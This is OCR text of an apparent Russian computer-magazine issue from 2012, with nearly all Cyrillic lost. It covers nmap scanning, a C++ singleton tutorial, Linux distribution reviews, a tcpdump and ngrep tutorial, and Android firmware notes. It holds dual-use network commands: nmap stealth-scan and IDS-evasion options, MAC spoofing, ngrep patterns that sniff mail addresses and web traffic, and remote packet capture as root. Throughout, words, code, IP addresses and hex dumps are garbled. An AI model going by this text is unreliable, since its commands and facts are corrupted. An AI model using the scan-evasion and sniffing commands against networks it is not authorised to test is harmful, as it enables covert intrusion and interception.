*:tomcat
*:postgres

<controllers>
cpu
cpu
cpu

<destination>
daemons/tomcat/
daemons/postgres/
default/

# ifconfig ethe 192.168.1.123


# ifconfig ethe hw ether :1:2::4:s
, ,+

tomcat daemons/
tomcat , postges- daemos/postges ,

- n default.

, .

nmap, :
--max-rate 50-
50 /;

# nmap -sS -Pn -n -il active-hosts


. ,

-f- ;
-g88- ;
--data-legth

50- 50

/ filteed.
?

/. :::

096

01 / 156/ 2012


-, :

(495) 229-2222 18-800-333-2-333 ( )


www.mancard.ru
:;;

.
"'
..."'
::;

. ..

<::

:z:

<< ->>.

29.01.1998 N21326"

deeonis ldeeonisc!gmail.coml

Sigleto. , ,-
- .
, -

Windows,

use

mode

- ,
. ,

, ini-
. , ,
,

Save,

. , ,

-
,
-


, ,
,

?
,
.
.
.


, ,-
,

gSettings,

. CSettigs .
, ,
, .
.

.
,

, Sigleto.
,

, .

098

class CSettings
{
pulic :

void getSettings() { ... };


11 .. .

01/156/2012

11

--

~s.;:~~ . . ,....

f>.

,.,., .., -u,.,.,.... o

csettings gsettings;

,. ,_,..,...,.

'''

....;.-:::::..::.;-

-,

~~~~

CSettings gSettings. , , ,

_, .... ..;.

, n n n

. ,

...... .._..........,

, , gSeetings

. . . . . .. . -(1

01

n . -,
n

CSingleton;

gSettings, ,

class CSettings

n ,
.

, n
. n
. -, CSettings, ,

private :
CSettings ();
static CSettings* m_instance;

puic :

n, ,

gSettings

static CSettings* getinstance()

. ,

{
i f (m_instance == )
m_instance = new CSettings();
return m_instance;

, , n .

- :
static
.

void getSettings() { ... };

11 . . .

class csettings
{

/1

pulic :

static void getSettings () {.

-~};

// ...

/1

/1

CSettings* CSettings: :m_instance


= ;

CSettings

CSettings: :getinstance()->getSettings();
CSettings: :getSettings();
, , CSettings
n

, , .

, new.

- -

, , . ,
.

getlnstance[].
CSettings
m_i nstance, ,

n - .

, ,

. , 100 % - ,

ini-. ,

, , -

n ,

CSettings , CSettings

, n

n .

n, ,

] .

n <<>> . ,

. n

, <<

. ,

>> . .

, n .

CSingleto,

, ++

,
. , pivate ,

getlstance[], .
,

, . n

[ ,

], , -

01 / 156/ 201 2

099

getlnstance

~
. . ..

.;)

--

~ tt

~~

- -

n. n n.
-

..'/1'1 .. _

...._

--- --

.....-.....

( n }

CSingleton
template <class >
class CSingleton

,._,

w-.,. -u

static

tJ _ _ _
..
I J _ .. _..,, _ _

virtual - csingleton() {};

--------_...
....

puic :

,.,_ .._
tt,_,. .. c
,,,_.....

_.. _,_,
... ..- ..

,,~

,.,...

getinstance()

if (m_instance == )
m_instance = new ();
return m_instance;

-._..
-- - -~--~
~

...

...

t J-~I.Joo

,,,,_... ,...
,.,"_.,_.!_
1 1 1 _.... >1'

Wikipedia

protected :
CSingleton() {};
static * m_instance;

};

11 CSettings
class CSettings : puic CSingleton<CSettings>

getlnstance.

CSettings. ,

n ,

NQ 1
m_instance

, ,

CSettings , .
NQ 2, getlnstance,
, , m_instance.
NQ1, ,
CSettings ,
m_instance.

private :
CSettings ();
protected :
friend class CSingleton<CSettings>;
public :
static void getSettings() { ... };
11---

n.
, , ,
.

, . ++
n ,

getlnstance

CSingleton

n . -

I- .

Windows

CSingleton,

, :

, , ,

CSettings

n-n n,

n n

n, ++ fiend,

template <class >


class CSingleton{

puic :

new.

CSingleton

n n >>.

virtual -CSi ngleton () {};


static * getinstance()

. 00-

EnterCriticalSection( ... );

. ,

, CSingleto

if (m_instance == )
m_instance = new ();

, .
CSigleton, .

LeaveCriticalSection( ... );
return m_instance;
protected :
CSingleton() {};
static * m_instance;

};
,

CSettings,

toa

, .

ton :

s;"p to}

+ SW\etan ge!ONL\'()

Sing)eton ge!ONLYQ {
:ONLYnull) ONLY
rttuznONLY;
}

w Sing)etor();

<< >>
. , , ,
, .

100

, -. ::

01 / 156/201 2

2012


21:21

liECnATHD
n

zxz

--------~--------

UNIXOID

ginde lg i nd e ratu x.i n . u al


LINUX


,

Sabayon n

Sabayon emege

> ,

.config Calculate
Linux
1560 ,
- 866,
Sabayon
- 2625 1250

equo,


Calculate
Linux

ntoo,

, ,
:
.
,

( US

l, , >>
.

Sabayon 7

: s.g
:

GPL

Linux Mint

i686,

86_64

: l tel P etium

11, 512 RAM, 6


Gl ibc 2.13, Udev 171, . g 1.10.4, GNOM E 3.2, 4.7,
L ib e O ffice.O g 3.4.3
13 . 0 ,

S - Getoo ,

D istowat c h.co m .

PCLinuxOS


Faio E c u li ani . ,


64.

no , Mageia

Mandiva .

Gentoo

, .

Gentoo.
5.4

Seve B as e ~ :, .

102

01/ 156/20 12

>> ,

Sabayon


, .
,

6 /etc/make.cof

. ,
, ,
.

make.conf

Liv-

. (
]. Anaconda,

. ,
. , ,
,

.
, ,

man].
Sabayon

, ,

Sabayon n Entopy Stoe

. ,
wid-,

4:3

SpinBase:
GNOME;
: XFce, LXOE, Enlightenmet SpinBase/
OpeVZ ( OpenVZ].
: ,

GNOME

, t

.
.
,

SpinBase

ATI NVidia]

. :

(Fiuxbox] . 4.1
Molecule.
DAILY .

. . ,

, Calculate Linux ( Calculate

( isohybid] .

Gentoo,

Potage,
. ,

Sabayon

. .cofig

866,

Sabayon

Sabayon

2625

1560 ,
1250

].
,

/etc/skel

Entopy. , , ,

Getoo ,
.

equo:

,
,

Gentoo

CL.

mc

# equo install

14 ],

equo , , ,
apt-get: ,

, ,

smt- ( ],
.

Magneto
Stoe eqL!O ( Magneto]. Stoe

DISTROWATCH.COM
06.11.2011]

( ;. ] ,
: i .

(U S -, " , . .] ,
r
Potage. : emege ,

equo ! Package Setting],

- . ,
,

equo

.
, , ,

Sabayon

01 / 156/2012

Ca lculate Linu x (

1. Mint
2. Ubuntu
3. Fedora
4. Oeian
5. openSUSE
6. Arch
7. PCLinuxOS
8. CentOS
9. Puppy
10. Mandriva

2155
2108
1686
1318
1290
1222
1032
916
866
708

11. Mageia
12. Lu buntu
13. Scien tific
14. Zorin
15. Slackwae
16. Chakra
17. Sabayon
18. FreeBSD
19. Bodhi
20. Gentoo

627
612
575
563
563
563
557
490
478
453

],

103

UNIXOID

Calculate Linux 11.9

: calculate- lin ux. u


: GPL

REDHAT/FEDORA SLACKWARE

: i686, 86_64

: lntel Pentium 11 , 128[XFce) 512[)

RAM, 4-6

, RedHat/ F edoa Slackwae,

Kenel3.0.4, Glibc 2.23.4, Udev 164, .g 1.10.4, GNOME 2.32.1,


4.7.1, Lib e Office.Og 3.3 .4

. ,

n n

, .

Linux

CetOS , , ,

RedHat

: ICDS- Diectoy

F e doa

Sv) - [C LO) -

, ,

<< .

, >> ILDAP, mail, ftp,

Fusion Lin ux [ fusionlinux.og ). Fuduntu

j, , . .) . ,

[ f u duntu.o g ] Ubuntu,

. ,

F e doa.

Xange Linux [openxange.com ] - n-

: GNOME ICLDG), XFce ICLDX), [Calculate

, .

Media t, ), CLS ICalculate Linux


Scatch) CSS ICalculate Scatch Sv ) .

RedHat [ , CentOS]
Yellow Dog Linux [yel lowdog linux.com ]. ,

, ,

w S.

( .

. , >>

Vectolinux [w ww.

Gentoo, IR-

vecto linux.com ], ;

Gentoo Foudation . [Anthon y G. Basile)

Zenwalk [ zenwalk.og ] ,

hadened/seliux-epc.
100% Gentoo [ - Gentoo)

DeepStyle [ deepsty l e.o g.ua ] Agilialinux [

MOPSLinux, agil i alinux.u ].

, CL n .
n

Calculate 2[
) . , n cl-install,

1/va/li/Iayman/calculate/pofiles/patches ) , , ,

, , ,

, n

n n

Gub .

n- ,

n , n n

n. n

n Gpated c/fdisk. LVM

/va/calculate/linux cl - instal l.
Cho mium 05 , , .

soft RAID / t-. n


IR C , n
. , .
RAM,
, . ,
initamfs udev, ,

, n Sabayon.

11.0 , ,

Sabayon,
n, ,

~.~ ~

n [ ) . CL

equo,

lot~l

Oioltlof.
J~IIc:

~coeollnoRc:

emege,
, , << vs >>.

, n n

[ ).

u:I'01
n S.:

eselect profile list

Proyctpltp:

j tpO.renon.ntt

NPctpltp:

[ *>>) .

eselect profil e set 1

cl-instlll

-disk/dtY/sdo~2:/:et4

--set

os_insto~ll_ll_dto_drvfglrx

Gentoo. CL
- n, , US- .
n uild-

Calculate Linux n n

01/156/2012

50% ] .

2.32.

'Jo411WHIIHn!r.~
'J fl!.}(i~lf ~I t JI

XFce, Fluxbox

: V - [

1<>.

!Jfln<J~r

, ], - - [ ].

n
nolll)'kr. ...poelfiT~

], .

\1
-~ ..

-,
~~~.:'

n.I

JJU: ......, .

'71
1\f~~...

~;r.:.~~

Windows

,':~.~~

~~~~~

~~==

"
~~t

,:::.

~'::.:

Zorin OS 5.1

: zo i n-os.com
HI)'IIM

nporpi!MI'I~t-

0~::.-:.::

&:'=.':.

6SIN~C-~

GPL

i386, 86_64
lntel Pentium 11 ,512 RAM, 6
Kenel2.6.38, Glibc 2.13, Udev 167, .g 1.10.1 , GNO ME 2.32 .2,
L ibeOffice.O g 3.3 .3.1

0 Ntnu gl !

1~'*1

Liu x Mi t

Ubuntu

Ubuntu,

Windows.
[ GnoMenu, , ,
] Wi n7.

UBUNTU

, .

, . ,

Nautilus-Eiementay

Gloobus Pe v iew,

Apple Quicklook.


, Softwae Cente .

Linux Mint 11 "Katya"

Zoin

linuxmint .com
: GPL
: i386, 86_64
: lntel Pentium 11, 512 RAM, 4
Kenel2 . 6.38 - 8, Glibc 2.13, Udev 167, .g 1.10.1, GNOME 2.32 .1,
LibeOffice.Og 3.3 .2
n Ubu ntu, ,
, Linux. n [

05 Look

Cha n ge

,
,

Win7, WinXP

Ubuntu.

-lntenet ws Manage - n

- [ Chome].

PlayOnlinux

ZOS

Wine
Windowsn Ubu ntu.

Wineticks, n n

npopa .

, - [

] n Oistowatch.com,

n],

-n n. >>

Multimedia, Gaming] .
Ubuntu, LS- [3.1].

Clement

Lefebve.

n - n ,

Lite [ LXO E] Educational


[Uitimate, Business,

[n n ].
n Windows-ce.
n ,

Ubuntu,

100 %.

, ,

Ubu ntu,

. n
, . , n ,

mintMenu, n mint lnstall


mintUpdate . mintlnstal l

n : >>.
, , ,

Ubuntu

Softwa e Cente,

n , .
, -

[c ommun i ty . linuxmint.com/softwae ].

mintUpdate

: , n

, << >>.

Ubuntu,

L S -

LMOE, Oebian
Gnome XFce Rollig
elease. LMOE [201109].
GNOM E [

01 /156/2012

Zor i

05

Win7

105

UNIXOID
n

Localization Manage laddlocalel: n

n , , .
n,

. n, n

PCLinuxOS Magazine,
CAEiinux, TinyMe ZEN-minil.

IKaoshi,

Mageia 1

: mageia.og/u/
:

Po~sh
Port~se(t;1lfl

Portuquese

GPL

i586, 86_64
lntel Pentium 11, 512 RAM, 6
Kenel3.0.4, Glibc 2.12.1, Udev 173, . g 1.10.4, GNOME 2.32 .1,
4.7.4, L ibeOffice.Og 3.4.3

( Portug~11

PunjaI

Romanlan
Russi

, -

2010.

Mandiva, .
,

PCLinuxOS

Mandiva, ,

addlocale

MANDRIVA

, Mandiva

, , n
, , . ,

Mageia

PCLinuxOS

2011 Desktop

pclinuxos.com
GPL
: i586
: lntel Pentium 11, 512 RAM, 3
Kenel2.6.38.8, Glibc 2.11.2, Udev 168, . g 1.10.4, GNOME 2.32.1,
4.6.4
:

161

20

. -, 32-

GNOME.

IEuopa

150,

21. V-
32-,

64- . .

Mageia n Mandiva .
Mageia Li ve ,
. ,

2003 Mandake
! Mandival. Radically Simple .

n :

, ,

>> .

, Liv-.

. n

Cente, Mandiva . n

2007 PCLinuxOS

Mandiva .

Mageia

Contol

Rpmdake.

-, IXFce, LXOE, OpenBox GNOMEI

Mandiva

. n

, mageia.og/en/1/migate . :::t:

Full Monty Oesktop OVO, . Rolling


elease, n RPM-based.
PCLOS , n 64 - CPU.

Mageia 1.

-,
n n.
n , LibeOffice
.

URPM

PCLinuxOS

, n n

Synaptic.

n n , n

k, n n : , .
n , n-

ZOS
WINE

PLAYONLINUX
106

WINETRICKS

Mageia Mandriva,

01 /156/2012

le xec it . rul

TCPDUMP
UNI-

.
,

tcpdump.

Linux

SD- , ,

I:I:J:Itl:ll!lli

tcpdump-

, ,
.
,

tcpdump

25

UNJX.

UNJ-

Windows

li bpcap,

tcpdump.

tc pdump,

,
.

107

UNIXOID

[raot~hast
tcpdu~:

x_unixoid_ tcpdUfl'4']t; sudo tcpdUI!fl -i

vebose

ou tput

s up pess ed ,

use -v

- vv

~.&.~la n B -
f

lB -n host 192 . 168 .8 . 1 and port 53

fu l l

decode

potocol

1ist ening ~o~lanB , lt nk - type EH1BI13 ( Ethernet J, capture slze 65535 bytes
16 :22 :41 .348 185 IP 1 92. 1 68 . .1 1 . 418 > 192 . 168 .8 . 1.53 : 49244+ ? . u . ( 23J
16 :22 :41 .345182 IP 192.168 .8.1 .53 > 192 . 168. . 11.461 : 49244 /2/3 213.188 .284 .3, 77.88.21.
3, 87 . 258 .258.3 , 87 . 258.258.283 , 87.258 . 251.3 , 93.158.1 34.3 , 93 . 15.134.2 , 213.188.

193.3 !254 )
16 :22 :41 .345381 IP

> 192.1 68 .8.1 .53 :

192 .16 8 . . .7336

16 :22 :41 .352162 IP 192. 168 .8.1 .53

>

192.168. . 11 .376:

63342+

ya .ru . !23)

63342 812/3

213.188.193 .3 ,

213 . 188.2

84 .3, 77 .88.21.3, 87 .258.258.3, 87.258.258 .283 , 87.258.251.3. 93.158.134 . 3, 93 . 158 . 13


4.283 (254)
16 :22 :41 .599428 IP 1 92.16 8 . .1 1 . 37935 > 192 . 168 .8.1.53 : 43368+ R'? ~ . tns-counte . u . (36 J
16 :22 :41 .684278 IP 192.168 .8.181 . 48944 > 192 . 168 .8.1.53 : 4465+ '? yandex .st . 127)
16 :22 :41 .684422 IP 192 . 168.8.1.53 > 192.168.8..7935 : 43368 5/212 R 217 .73.288 . 219 , 2 17.73. 2
8 .228, 217 . 73.28 .2 21 , 217.73.28 . 222, R 2 17.73.288.218 1193)
16 :22 :4 1.684742 IP 192.168.8.18 1 .58447 > 192.168 .8.1.53 : 23622+ R? ~J.oR&J . tns -counte . u . 136)
16 :22 : 4 1 . 68116 IP 192.168.8.HI1.5561 4 > 192.168 .8 .1.53 : 14996+ ? mc . yandex .r-u . {38 )
16 :22 :4 1.611178 IP 192.168 .0.1 .53 > 192 . 168.8 . 181 . 48944 : 4465 5/2/3 213.188 . 193 . 215 , 213.18
.284 . 2 15, 77 .88 .2 1.2 15 ,
18 packets capt ued

87 .258.258 . 215 ,

11 packets ecei ve d fl lt e
packets dropped kenel
[ r- oot@~host x_unixold_tcpdumpHI

DNS -anpoc

tcpdump ,

, UDP, ICMP, SMB/CIFS, NFS, AFS, AppleTalk. tcpdump


?
. :

Flags [.], seq 3666073194:3666074622, ack 3281095139,


win 2, options [, , 5 val 70228462 ecr 1681724],
length 1428

93 . 158. 134 . 215 1213)

- , tcpdump

[ !:

flags - .
5 (SYN), F (FIN), (PUSH)

tcpdump

R (RST),

> s udo

tcpdump - i wlanB - 2 -n -v host 192 . 168 .e . l and port 53


tcpdump : 1istenl ng on wlanB , 1in k-t ype EtBtf3 < Ethe netJ, capt ue size 65535 bytes
16 :49 :22 . 218552 IP <tos , ttl 64 , id 8339, offset , flags FJ , t UDP <17 ), leng th 51 )

192 . 168 . . 18 1 .5387 9 > 192 . 168.8 . 1.53: 52+ ? . u . <2J


16 :49:22.224219 IP ltos 8 , t tl 64 , id , offset , flags CDFJ , proto UDP ( 17), length 282)
192 . 168 .8 . 1.53 > 1 92. 1 68. . 11 .5 79: 52 8/213 ya .ru . 87.25.25 . 283, .u . 87.25.251.
3, .u. 93 . 158.134 .3, .u. 93.158.134 .283, .u. 213.188.193.3 , . u. 213.188 . 284.3
, . u . 77 .88.21.3 , .u. 87 . 258 . 25 . 3 (254 )

2 packe t s
2 packets

captued
ece i ve d fllte

~ ~ackets dopped kenel

DNS-anpoc

data-seqno - n ,
first:last, first last-

n
n

nbytes.

ack - (ISN + 1).


window- .
options - ,
n cmss 1024> ( ).
lenght - .

, tcpdump

, ' -':

t [ , tcpd ump
! ,
:

# tcpdump -i wlane

-n

# tcpdump -i wlane - 1 -n - \
host 192.168.0.1 and port 80

, , .

-' I - DNS-.

,
:

,
, .

# tcpdump -i wlane
d port 53

- 1

-n host 192.168.0.1 \

, tcpdump, ,

-v'. IP

I- :

(tos , ttl 64, id 8339, offset , flags [DF],


proto UDP (17), length 51)

DNS-apoc tcpdump.

, DNS-apoc [ 531 192.1 68.0.101

192.168.0.1 . ?
16:22:41.340105-

- , .

[TOSI , [ LI ,
,

[ facl.

, , [,

UDP, ICMP) .

IP, ,

. , ,

. tcpdump

tcpdump, .

, host t,

, ,

tcpdump DNS- -

, ?

49244+ ? ya.ru. (231 , ,

?>>, .u,

/I- 23

# tcpdump -i wlane

- n src 192.168.0.1

. - .
,

dst,

. ,

d:

[8/2/31 [

213.180.204.3, 77.88 21.3, 87 250 250.3 .. 1.

108

# tcpdump -i wlane port not 22 and port not 53

01 /156/2012

GREP

tcp dum p

TCPDUMP
tcp dump:

i []- ,
.

g,

, .
, ,

POST

GE T

-,

n- I - DN S- .
nn- 1 - .

- th t- .

# g re p

- 1 -q - d eth e
t cp and port se

" G

J s

v, -vv, -vvv -

" \

!, , ! .

[n] -

s[n] - , !

ngrep - i 'game* Jpe rn] adult'


- d ethe > s la cke r s. t xt

-w

!.

byl i ne \

5- -
! sequece u mbes l.

- t h t- .
q- ! ! .

S - :

ng rep - i 'rcpt t o Jmail from ' tcp port smtp

- I s - .

, SS

DN S - . ! ! exce pt lel.

SY N ! - ] ,
:

, tc pdum p :

#
#

tc pdump - i wlane

- 1

t cpdu mp 'tc p[13];;2 '

- n port r ange 21- 23


? . -

. SY N .

tcpdump -i wlane

-n > 32 and <; 128

, . ,
:

#
#

t cpdump - i wlane 1 -n s rc net 192.16S.e. e/16 \


and dst net 1e.e.e.e; s or 172 . 1 . . / 1

t cpdump ' tc p[tcpflags ] & tcp- syn !;


tcpdum p :

tc pd ump -

/ I .

tcpdump,

: p oto[exp:size], t - , -

, size- ,

! 1
] . , -

1 ,

tc pdump

- ,

nm ap. , nm ap

192.168.0.100

15 : 49 :38 . 719422 IP 192.168 . . 1 . 596 24 > 19 2. 168 . . 111 . 8888: Flags [5 ], seq 1 36557188, win 32792 , options [mss 1
+6396.sackOK.T5 val 94976812 e.nop . wscale 5], length
15 : 49 :38 .719425 IP 192.168. . 111.8888 > 192. 168 . . 1.5962 4: Flags [R.J. seq . ack 136557189, win , length
15 : 49 :38 .719435 IP 192.168. . 1 . 54946 > 192.168 . 0.111.587 : Flags [5], s eq 2921975 2 1. win 32792 . options [mss 16
+396,sackOK,T5 val 9497681 2 e.nop . wsca le 5J, length
15 : 49 :38 .719438 IP 192.168 . . 111 . 587 > 192 . 168 . 0 . 1 . 54946 : Flags [R.J . s eq . ack 2 9219752 2 . win . length 0
15 : 49 :38.719449 IP 192 . 168.0.100 . 43337 > 192. 168 . 0.111. 22 : Flags [5 ], seq 2610 24 277 . win 32792 . options [mss 163
+96 , sackOK.T5 val 94976812 0,nop,wscale 5J, length
15 : 49 :38 .719457 IP 192 . 168 . . 111 . 22 > 192.168..100.433 37: Flags [5. ] , seq 349677 23 9. ac k 261 24278, win 32768,
+ options [mss 16396,sackOK,T5 val 94976812 94976812 .nop.wscale 5] , length 0
15 : 49 :38 .719463 IP 192 . 168 . .100.43337 > 192 . 168 . . 111.22 : Flags [ . J. ack 1. win 1025, options [nop,nop,T5 val 94
+976812 94976812], length
15 : 49:38.719883 IP 192.168 . . 10 . 4887 > 192 . 168.0 . 110.111: Flags [5 ], seq 472646806 , win 32792 . options [mss 16
+396.sackOK.T5 val 94976812 e,nop,wscale 5J, length 0

1. -

01 /156/2012

109

UNIXOID
16:30:16.611690 IP 192.168.0.100.48585 > 192.168.0.111.135: Flags [5], seq 1679394613. win 4096, options [mss 146
+0], length 0
16:30:16.611700 IP 192.168.0.111.135 > 192.168.0.100.48585: Flags [R.]. seq 0, ack 1679394614. win 0. length 0
16:30:16.611715 IP 192.168.0.100.48585 > 192.168.0.111.8080: Flags [5], seq 1679394613. win 3072, options [mss 14
+60]. length 0
16:30:16.611724 IP 192.168.0.111.8080 > 192.168.0.100.48585: Flags [R . J. seq 0, ack 1679394614. win 0. length 0
16:30:16.611738 IP 192.168.0.100.48585 > 192 . 168.0.111 . 23: Flags [5], seq 1679394613. win 2048. options [mss 1460
+ ]. length 0
16:30:16.611748 IP 192 .168.0.1 11 .23 > 192.168.0.100.48585: Flags [R .], seq 0, ack 1679394614, win 0, length 0
16:30:16.611763 IP 192.168.0.100.48585 > 192.168.0.111.22: Flags [5], seq 1679394613, win 4096. options [mss 1460
+ ], length 0
16:30:16.611789 IP 192.168.0.111 . 22 > 192.168 . 0.100.48585: Flags [5 . ], seq 625029896. ack 1679394614. win 32792.
+options [mss 16396], length 0
16:30:16.611798 IP 192.168.0.100.48585 > 192.168.0.111.22: Flags [R], seq 1679394614. win 0, length 0
16:30:16.611816 IP 192.168.0.100.48585 > 192.168.0.111.111: Flags [5], seq 1679394613. win 1024, options [mss 146
+0], length 0

2. SN-

- ,

, -

SYN-nae (5 ). 8888,

, , ,

RST-nae. ,

, .

- , -

587

. ,

nmap

SYN-nae

22- (SSH) SYN-ACK:


192.168..1.43337
224277,

192.168..111.22:

Flags (5], seq

ack

>

192.168..1.48585

Flags (5],

192.168..111.22 :

seq 1679394613, ...

...

>

192.168..111.22
349677239,

>

tcpdump
2.

192.168..1.43337 :

26124278,

192.168..1.43337

>

192.168..111.22:

nmap

Flags (5.], seq

> 192.168..1.48585: Flags (5.],


ack 1679394614, ...
192.168..1.48585 > 192.168..111.22: Flags [R],
seq 1679394614, ...
192.168..111.22

seq

.. .

Flags (.], ack 1,

62529896,

, ,

RST-nae, .

SYN-ACK,

: , -,

, .

UD-. :

, ,

UD- ,

, n .

3
nmap

. ,

ICMP

uneachae:

, n
. , ,
,

nmap,

16 : 41 : 48.79831

, .

SN-

(nmap -sS). -

IP

192.168..1.612

192.168..111.18869:

16:41:48.798346 IP
192.168..1

UDP, length

192.168..111

udp port 18869

>

>

192.168 . .1:

unreachale,

ICMP

length 36

.
- ull-,

R-

(nmap -sN).

, .
,

Linux

RS-:

-, tv.adobe.com, n
,

RTMP .
tcpdump .

win

R- ,

192.168. . 111.256

192.168..1.39132
372,

length

>

Flags (],

192.168..111.256:

>

Flags (R.],

192.168..1.39132:

ms-

tcpdump -eflAi ethe -s -w - 1 strings 1 \


grep - "rtmp://.\+.flv"

FIN, URG PUSH (- ,

):

tmpdump (l kc l. net/tmp )

192.168..1.35331

flv- :

seq

$ ./rtmpdump -r 'URL'

seq

399895961,

win

192.168..111.5544
- .flv

ack

>

192.168..111.5544:

496,

>

urg

length

Flags (FPU],

192.168..1.35331:

Flags [R.],

399895962

, . -

110

01/156/2012

16:~1:~8.798310
16:~1:~8 . 7983~6
16:~1:~8.798371
16:~1:~8.79838~
16:~1:~8.798~00
16:~1:~8 . 798~12

16:~1:~8 . 798~29
16:~1:~8.798~~1
16:~1:~8.798~56
16:~1:~8.798~67

16:~1:~8.798~83
16:~1:~8.798~95
16:~1:~8.798510
16:~1:~8 . 798522

IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP

192.168.0.100.61020 > 192.168.0.111.18869: UDP, length 0


192.168.0.111 > 192.168.0.100: ICMP 192 . 168 . 0.100 udp port
192.168.0.100.61020 > 192.168.0.111.31335: UDP, length 0
192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port
192.168.0.100.61020 > 192.168.0.111.50919: UDP, length 0
192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port
192.168.0.100.61020 > 192.168.0.111.5~11~: UDP, length 0
192 . 168 .0.111 > 192.168.0.100: ICMP 192 . 168.0 . 100 udp port
192 . 168 .0.100.61020 > 192.168.0.111.6971: UDP, length 0
192.168 .0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port
192.168.0.100.61020 > 192.168.0.100.19663: UDP, length 0
192.168 .0 . 111 > 192 . 168.0 . 100: ICMP 192.168.0.100 udp port
192.168.0.100.61020 > 192.168.0.111.1950~: UDP, length 0
192.168.0.111 > 192.168.0 . 100: ICMP 192.168.0.100 udp port

18869

unreachale,

length 36

31335

unreachale,

length 36

50919

unreachale,

length 36

5~11~ unreachale,

length 36

5971

unreachale,

19663

length 36

unreachale ,

length 36

1950~ unreachale,

length 36

3. UD-

1-sA) tcpdump

17:48:58 .999718 IP 192.168...43949 > 173.19<:1.32. 18.00: Flags IP.J, seq 1835416245:1835417611, ack
~o~ln 557. opt lons [nop,~QJJ,TS val 9697~96 7652175631, Jength 1366

8000:

4SEIB BSSa

979

4000 4006 8813

exeete:

adc2 2812
t B22d

oose

z:

RST. , ,
nmap ,
. tcpdump

7469

d0 4361
296d 6178
2d41 6765
352 3028
7838 365f
~9 742f

<:

0:
8:

> 192.168.0.111 :

> 192 . 168.0.111: ICMP

> 192.168.0.111: ICMP

6578 2d61

52d 4 f 74

2dl

6765

74 320 <'k:l f 79 12f

2858 3131
3634 2920
3533 352

7920
6557 6562
4854 4d4c
6f 2920 4368
3833 S2 3230
3335 231 d
7874 2 f68 746d
696f 2f 7868
7 6963 6174
32 392 2a2f
6363 6570 742d
67 6970 264
d i141 6363
6765 2 S
238 d<'I 4163
6574 320 4953
7466 2d38 71

2 469 75

417 70
312 284)

23 71d 32 38d 84 1

Oxe l S:

456 6f 469 67 320

01 6:
8170:
018:

6566 l 7465
6570 742d 4:1
2d55 532 S
6365 7!f74 2d43
4f2d 3539

8:.<8190:
exetao:

69 7665
726f 3
Bd0a 5573 6572

6368

8140:

08 1 00:

f 320 S

110:
0 1 2:
138:

Oxe8f8:

I~MP

2d9c

220 69 665 2847 6563


726f 6dS 2f31 342 302
3220 5361 6661 7269 2f35
4163 6365 774 32 7465
2 6170 ? 6963 6174
74d 2 78d 2 6178
696f 6e2 f 78d 713d

> 192.168.0.111 : ICMP

86 s7 64

?:

d:

16 : 43 : 06.008305 IP 192.168.0 . 100


type-#68, length 1032
16:43:06 . 008383 IP 192.168.0.100
type-#34, length 1032
16:43:06.008714 IP 192.168.0.100
type-#183, length 1032
16:43:06.008831 IP 192.168.0.100
type-#192, length 1032

ete t

890:

ed8c

850:

, , I-

29

0065

t11 t:f745 5420 2f28 4854 5450 2f31


21 J t:!f 7374 29 1 772 67 f
f7 :S 26 fd dE'Ia 43f 6563

8)(8830:
ftx8840:

88

d s 731

273 6463
7 7561
71 d
861 7273
2d1 275

3878972.

... . ~.IJ . .

.. Pf: .. l ..

... -) ..... ..... m


-..G .!./1
.1 .. !>t: . ldW~o~ . go

og l e.com .. Comec

t lon: .keep-allve
.. Cache-Contro l :
.max-age=B .. User
-Agent: . oz l llat
5 . 8. : .Ltnux .
86_4) .Rpplei-Jeb
Klt/S35. 1 .CKHTL

, . llke.Gecko) .Ch
011t 1 4 . .35 .2
2.5ataltSS.I ..
Rccept: . text/htr~

l ,app l lcatlon/xh
tml+xlll.appllcat
l ontxl:Q=8.9 . /

:q=0.8 .. Rccept Encodlng: .gzlp,d


eflate.Sdch ..
ept-Language : . en
-US,en:q=0.8 .. Rc
cept -Charset: . 15
o-8859- l,utf-B; q

google.com tcpdump

, ,
.
I-

. ! , SYN)

, ,

tcpdump ,

. ,

Cisco Disco v ey Potocol ,

Cisco

.
,

tcpdump

# tcpdump -nn -v -i eth0 -s 1500


'ether[20:2]
02000'

1 \

Wieshak:
,

$ ssh root@example.ru tcpdump - w - 'port !22' \


1

wireshark -k -i -

DHCP IDISCOVER, REQUEST, INFORMI,

'-w

Wieshak ,

# tcpdump -i eth0 -vvv -s 1500 '((port 67 or \


port 68) and (udp[8:1] = 01))'

St:

, -:

$ ssh root@example.ru "tcpdump -nn -i eth1 -w -" \


snort

/etc/sort/snort.conf

-r -

g,
,

# tcpdump -i eth0 "tcp port 3 and ip[40] = 85 \


and ip[41] = 83" -s 1500 -n

l:i!:Ii
tcpdump
,

, .

# tcpdump -nnvv -r dump.cap tcp


grep -v "tcp sum ok" 1 wc -1

01 / 156/2 012

,
. :::

111

ANDROID-POWBKY

l'' .,

Andoid

,

'

____
_ ...J
goo.g!I!IHRo

fa mewo k- es . ap k.

goo .gi/vz8

Andoid .

goo.gi/Ya!IX

n .

goo.gi/P6JR

IBM .

goo.g!lsGXwa

Andoid

L~nux,

Honeycomb.



Android :~~~~: ~

~: _ ,

, .
,
Andoid ..,..
.

ndid- ! '

Andold ,

2.
3.

~
~
n ~ ~ ~
. , ,
' .




3

~

11

META-IN F,

boot.img

system.

,
,
, ,
NND- ,
- ,
.

boot.img ,
Linu x initd.

/. ,
,

BFS

NFS,

xda-developes
ClockwokMod.
,

system -

, .


Andoid

Linux.

, .
:

- : , ,

. .

in - /in /us/in Linux.


,
. ,

xda-developes

dalvikvm.

t- . /t Linux,

, , .

Andoid /data/data.

fonts- .

, ,

Doid ! Roboto Andoid 4.01 .

C l ockwokMod ,

framework- Jv- ,

lo , ,

did- . famewok-es.apk,

][J.

, , ,

lib- L inu - ,

. ,

. /lib /us /lib Linu x,


, libc !,
Andoid Bionic Glibcl, libz lgz i

, .
?

l, libss l .

- , ,
xda - developes . com.

media- :

Mobile, Windows Phone

iOS, Windows

Andoid. ,

, ,

tts- , .

F oums

usr-

. Andoid

, in. ,

Development

<< u And oid

/ us/shae.

I ROM] >>. -

CyanogenMod,

2.3 Rom>>

, ,

!, , !.

vndr- , .
f im wae <<

>> ,

xbln -

Wi-Fi.

, ,

, , -

in . ,

, ltop,

ROM

unzip:

!. CyanogenMod
:

busybox

$ mkdir -/ rom; cd -/rom


$ unzip . . / / / .zi

bash, ss h, powetop,

. .

build.prop- a, ,
.

/system/ap p

, , ,

. ,

Andoid, ,

